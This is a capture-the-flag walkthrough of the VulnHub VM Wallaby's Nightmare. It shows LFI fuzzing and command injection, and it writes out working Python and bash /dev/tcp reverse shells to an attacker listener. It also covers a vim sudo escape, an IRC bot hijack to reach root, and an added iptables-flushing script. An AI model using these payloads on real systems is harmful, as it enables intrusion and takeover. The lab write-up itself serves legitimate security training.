Preface
⏰ Date: 2023.8.1
🗺️ VM download: https://download.vulnhub.com/wallabys/wallabysnightmare102.rar
⚠️ Everything in this post was done inside a lab VM; never use any of it against real systems without authorization.
🙏 My skills are limited, so please point out any mistakes, and thanks for reading!
🎉 Feel free to follow 🔍, like 👍, bookmark ⭐️ and comment 📝
Information gathering
Probe the host's ports and services with nmap:
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -A -T4 -p- 192.168.58.167
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
| 256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
|_ 256 4c:87:71:4f:af:1b:7c:35:49:ba:58:26:c1:df:b8:4f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Wallaby's Server
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
6667/tcp filtered irc
MAC Address: 00:0C:29:DF:68:78 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.047 days (since Sun Jan 15 11:16:44 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Visit port 80.
The page is loaded through a ?page= URL parameter, which looks like a file inclusion (LFI).
Testing it got our IP banned straight away.
Scan again to see whether other ports have been opened in the meantime:
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -p- $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 12:45 HKT
Nmap scan report for 192.168.58.167
Host is up (0.000043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6667/tcp filtered irc
60080/tcp open unknown
MAC Address: 00:0C:29:DF:68:78 (VMware)
LFI fuzzing
Port 80 has disappeared from the second scan and 60080 is open instead, so visit 60080 directly.
The inclusion still works there.
Fuzz the value after ?page=; a page called mailer exists.
Reverse shell
The page source of mailer carries a hint:
its mail parameter lets us execute commands.
Send a Python reverse shell through it, with a listener waiting on 192.168.58.153:9999 (the payload below is shown unencoded; URL-encode it before putting it in the query string):
?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.153",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once the shell connects, upgrade it to a proper TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Check what sudo -l allows.
Look at the iptables rules that are restricting us.
Flush the firewall rules.
Port 6667 showed as filtered in the earlier scans; rescan it now and it is reachable.
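The writeup does not print the commands behind the two firewall steps. The script below is an added example, not the writeup's own commands. It assumes that sudo -l showed the web user may run iptables as root (change IPT if the shell is already root, or set IPT="echo iptables" to print the commands without running them) and resets the firewall to accept-all before port 6667 is rescanned.

```bash
#!/bin/sh
# Added example (not from the writeup): inspect and then reset the target's
# iptables rules. Assumes sudo -l allows iptables as root; set
# IPT="echo iptables" for a dry run that only prints the commands.
IPT="${IPT:-sudo iptables}"

# List every chain with policies, counters and rule numbers. -n skips reverse
# DNS so the listing does not hang on a host without resolver access.
show_firewall() {
    $IPT -L -n -v --line-numbers
}

# Reset to accept-all. Policies are set first: flushing a chain whose policy
# is DROP would otherwise drop everything, including our own reverse shell.
flush_firewall() {
    for chain in INPUT OUTPUT FORWARD; do
        $IPT -P "$chain" ACCEPT || return 1
    done
    $IPT -F || return 1          # delete all rules in the filter table
    $IPT -X || return 1          # delete empty user-defined chains
    $IPT -t nat -F || return 1   # nat rules can redirect or hide ports too
    $IPT -t nat -X || return 1
}
```

After flush_firewall, rerun the port scan from the attacker (nmap -p 6667 192.168.58.167) to confirm the IRC port is now open. Flushing the rules is noisy and irreversible without a saved copy; run iptables-save first if the rule set matters.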
Get waldo
The sudo rules let us run /usr/bin/vim as waldo, and vim can spawn a shell.
Open an Apache config file as waldo in vim, then from vim's command mode spawn a bash reverse shell to a listener on 192.168.58.153:6666:
sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
:!bash -i >& /dev/tcp/192.168.58.153/6666 0>&1
Get wallaby & root
Connect to the IRC server on 6667 with irssi:
irssi -c 192.168.58.167 -p 6667 -n wallabyschat
/list  # list channels
/join wallabyschat  # join the channel
Try to make the bot run a command with .run ls; it does not work yet, so look at the processes.
Check the processes:
waldo@ubuntu:/home/waldo$ ps aux | grep waldo
waldo 676 0.0 0.3 29416 3104 ? Ss Jul31 0:00 tmux new-session -d -s irssi
waldo is running irssi inside a tmux session. The bot evidently only honours .run from the nick waldo, and that nick is taken as long as waldo's client is connected, so kill the tmux session (676 is a PID, so use kill rather than pkill, which matches process names):
kill -9 676
Then change our nick to waldo:
/nick waldo
Now have the bot run a bash reverse shell to a listener on 192.168.58.153:8888:
.run bash -c 'bash -i >& /dev/tcp/192.168.58.153/8888 0>&1'
The shell comes back as wallaby, and sudo su gives root:
sudo su